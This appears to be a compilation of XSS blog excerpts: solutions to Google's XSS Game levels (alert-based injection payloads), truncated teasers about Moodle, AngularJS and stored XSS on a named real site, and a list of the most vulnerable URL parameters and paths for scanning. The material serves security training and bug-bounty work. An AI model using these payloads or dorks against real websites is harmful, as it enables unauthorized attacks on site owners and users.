Unmasking the Power of Cross-Site Scripting (XSS): Types, Exploitation, Detection, and Tools

In an ever-evolving digital landscape, web application security is paramount. Cross-Site Scripting, commonly known as XSS, remains one of the most prevalent and dangerous security vulnerabilities. In this blog post, we will delve into the different types of XSS, explore how it can be exploited, and learn how to detect and mitigate it, all while…

Google XSS Game

https://xss-game.appspot.com/

Level #1: Hello, world of XSS
https://xss-game.appspot.com/level1
Solution: <script>alert('xss')</script>
Hint: inspect the source code of the page

Level #2: Persistence is key
https://xss-game.appspot.com/level2
Solution: <img src=x onerror=alert('XSS')>
Hint: the “welcome” post contains HTML

Level #3: That sinking feeling…
https://xss-game.appspot.com/level3/frame#1
Solution: https://xss-game.appspot.com/level3/frame#1' onerror='alert("xss")'>

Level #4: Context matters
https://xss-game.appspot.com/level4/frame
Solution: timer=');alert('xss

Level #5: Breaking protocol
https://xss-game.appspot.com/level5/frame
Solution: https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('xss')

Level #6: Follow the X
https://xss-game.appspot.com/level6/frame#/static/gadget.js
Solution: https://xss-game.appspot.com/level6/frame#data:text/plain,alert('xss')

Testing for XSS (Cross Site Scripting)

Hi, so today I'll tell you some techniques for testing XSS. First of all, these are important things you should note: copy-pasting XSS payloads doesn't work. PoC or GTFO: it's said that report checkers need a proper PoC for validation of the report; if it doesn't have one, your report cannot be triaged. So first, for testing XSS you…

Easy XSS On Mostly Educational Websites Via Moodle

Many educational websites use Moodle, which is vulnerable to reflected XSS (RXSS), and according to Shodan more than 50K websites use this technology. Moodle is a learning platform designed to provide educators, administrators, and learners with a single robust, secure and integrated system to create personalized learning environments. This was found by @PewGrand

How to find AngularJS XSS

Have you ever heard about publicwww? It's a search engine for source code, so publicwww will find any alphanumeric snippet, signature or keyword in web pages' HTML, JS and CSS code. They have this list of categories that you can search: Advertising, Marketing, Analytics, Technologies, Frontend, Widgets, CMS. You can find it here: https://publicwww.com. They also have plans and pricing if…

XSS Injection with SQLi

XSS Injection with SQLi (XSSQLi). Well, after our discussion on the different types of injection and the places where you can find an SQL injection vulnerability, an attacker can successfully exploit an SQL injection vulnerability and get access to the database, and if he is lucky enough to get access to the file system…

Using {XSS} to play games on Site

Hello guys, today I'm going to teach you how to play inside any website that has an XSS flaw. This technique is more aimed at making fun videos satirizing websites or even playing with your friends… The code is very simple because it only embeds the application of the game in question and an opening of…

Stored XSS on h2biz.net

I was surfing the internet when I came across this web portal, http://www.h2biz.net, which I found to be vulnerable to Reflected XSS. So I attempted to make a Stored XSS, because I noticed a kind of message board. I created a temporary email for registering on the website, then I completed the registration phase…

Top 100 XSS dorks

It’s the end of the year and a good time to share things with people.

After having scanned more than a million websites in order to find XSS and Open Redirect vulnerabilities, I took the time to do statistics on the most vulnerable parameters.

It can be used as a powerful dork list, so let's update your scanners and get bounties!

First, here is the list of the most vulnerable parameters along with their frequency.

Parameter Frequency
q 5.5%
s 4.5%
search 1.9%
id 1.7%
lang 1.4%
keyword 1.2%
query 1.1%
page 1.0%
keywords 0.8%
year 0.8%
view 0.8%
email 0.8%
type 0.7%
name 0.7%
p 0.7%
month 0.6%
immagine 0.6%
list_type 0.5%
url 0.5%
terms 0.5%
categoryid 0.5%
key 0.5%
l 0.5%
begindate 0.4%
enddate 0.4%
categoryid2 0.4%
t 0.4%
cat 0.4%
category 0.4%
action 0.4%
bukva 0.4%
redirect_uri 0.4%
firstname 0.4%
c 0.4%
lastname 0.3%
uid 0.3%
startTime 0.3%
eventSearch 0.3%
categoryids2 0.3%
categoryids 0.3%
sort 0.3%
positiontitle 0.3%
groupid 0.3%
m 0.3%
message 0.3%
tag 0.3%
pn 0.3%
title 0.3%
orgId 0.3%
text 0.3%
handler 0.2%
myord 0.2%
myshownums 0.2%
id_site 0.2%
city 0.2%
search_query 0.2%
msg 0.2%
sortby 0.2%
produkti_po_cena 0.2%
produkti_po_ime 0.2%
mode 0.2%
CODE 0.2%
location 0.2%
v 0.2%
order 0.2%
n 0.2%
term 0.2%
start 0.2%
k 0.2%
redirect 0.2%
ref 0.2%
file 0.2%
mebel_id 0.2%
country 0.2%
from 0.1%
r 0.1%
f 0.1%
field%5B%5D 0.1%
searchScope 0.1%
state 0.1%
phone 0.1%
Itemid 0.1%
lng 0.1%
place 0.1%
bedrooms 0.1%
expand 0.1%
e 0.1%
price 0.1%
d 0.1%
path 0.1%
address 0.1%
day 0.1%
display 0.1%
a 0.1%
error 0.1%
form 0.1%
language 0.1%
mls 0.1%
kw 0.1%
u 0.1%

This second list is almost the same, but with the corresponding path for each parameter:

Dork Frequency (%)
/?s= 3.6
/search?q= 2.5
/index.php?lang= 0.6
/pplay/info_prenotazioni.asp?immagine= 0.6
/shared/lgflsearch.php?terms= 0.5
/index.php?page= 0.4
/search?query= 0.4
/en/Telefon-Cam?search= 0.4
/index.php?bukva= 0.4
/pro/events_print_setup.cfm?list_type= 0.3
/pro/events_print_setup.cfm?categoryid= 0.3
/pro/events_print_setup.cfm?categoryid2= 0.3
/?eventSearch= 0.3
/?startTime= 0.3
/pro/events_ical.cfm?categoryids= 0.3
/pro/events_ical.cfm?categoryids2= 0.3
/pro/events_print_setup.cfm?month= 0.3
/pro/events_print_setup.cfm?year= 0.3
/pro/events_print_setup.cfm?begindate= 0.3
/pro/events_print_setup.cfm?enddate= 0.3
/search?keyword= 0.3
/?q= 0.3
/search/?q= 0.3
/index.php?pn= 0.3
/?lang= 0.3
/property/search?uid= 0.3
/index.php?id= 0.3
/search?orgId= 0.3
/products?handler= 0.2
/pro/events_print_setup.cfm?view= 0.2
/pro/events_print_setup.cfm?keywords= 0.2
/?p= 0.2
/search.php?q= 0.2
/?search= 0.2
/pro/minicalendar_detail.cfm?list_type= 0.2
/index.php?produkti_po_cena= 0.2
/index.php?produkti_po_ime= 0.2
/servlet/com.jsbsoft.jtf.core.SG?CODE= 0.2
/login?redirect_uri= 0.2
/connexion?redirect_uri= 0.2
/index.php?action= 0.2
/plugins/actu/listing_actus-front.php?id_site= 0.2
/index.php?mebel_id= 0.2
/search/?search= 0.2
/news/class/index.php?myshownums= 0.2
/news/class/index.php?myord= 0.2
/search.html?searchScope= 0.1
/search?field%5B%5D= 0.1
/videos?tag= 0.1
/videos?place= 0.1
/videos?search= 0.1
/?email= 0.1
/?cat= 0.1
/content.php?expand= 0.1
/?page= 0.1
/search/?s= 0.1
/?keywords= 0.1
/search/?keyword= 0.1
/apps/email/index.jsp?n= 0.1
/?name= 0.1
/?sort= 0.1
/search?search= 0.1
/pro/minicalendar_print_setup.cfm?begindate= 0.1
/pro/minicalendar_print_setup.cfm?enddate= 0.1
/pro/minicalendar_print_setup.cfm?keywords= 0.1
/search-results?q= 0.1
/?listingtypeid= 0.1
/search?s= 0.1
/pro/minicalendar_print_setup.cfm?categoryid2= 0.1
/?bathrooms= 0.1
/?listingagent= 0.1
/?featuredsearchseourl= 0.1
/?squarefeet= 0.1
/?siteid= 0.1
/?bedrooms= 0.1
/?featuredsearch= 0.1
/?price= 0.1
/?maxbuilt= 0.1
/?lsid= 0.1
/?listingtypes= 0.1
/?garages= 0.1
/?maxprice= 0.1
/?minprice= 0.1
/?keywordsany= 0.1
/?yearbuilt= 0.1
/?minbuilt= 0.1
/?subdivision= 0.1
/?lotsizeval= 0.1
/?listingstatusid= 0.1
/?mls= 0.1
/firms/?text= 0.1
/servlet/com.jsbsoft.jtf.core.SG?OBJET= 0.1
/plan_du_site.php?lang= 0.1
/index.php?Itemid= 0.1
/?view= 0.1
/?t= 0.1
/?selat= 0.1
/?selong= 0.1
/?nwlat= 0.1
/?geo= 0.1

I hope you enjoy this 🙂